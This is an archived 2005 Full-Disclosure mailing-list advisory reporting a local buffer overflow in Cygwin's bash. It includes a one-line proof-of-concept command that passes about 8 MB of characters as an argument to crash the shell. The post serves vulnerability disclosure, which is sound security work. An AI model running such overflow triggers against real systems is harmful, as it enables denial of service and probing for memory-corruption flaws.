OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-disclosure] Cygwin Bash Buffer Overflow

From: Rodrigo Gutierrez (rodrigointellicomp.cl)
Date: Sat May 28 2005 - 19:43:38 CDT


Cygwin Bash Buffer Overflow

Author: Rodrigo Gutierrez <rodrigointellicomp.cl>

Affected: Versions of bash distributed by the cygwin project

vendor url: http://www.cygwin.com

Type: Local

Background.

Cygwin is a Linux-like environment for Windows. GNU BASH is the GNU
project's UNIX shell. It replaces the standard UNIX Bourne and Korn shells.

Description

I think that cygwin people are cool, but Full Disclosure is a life style,
this is all you get guys, 8 megs.

PoC

youcygwin:~ /usr/bin/bash `perl -e "print 'a'x8388600"`

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/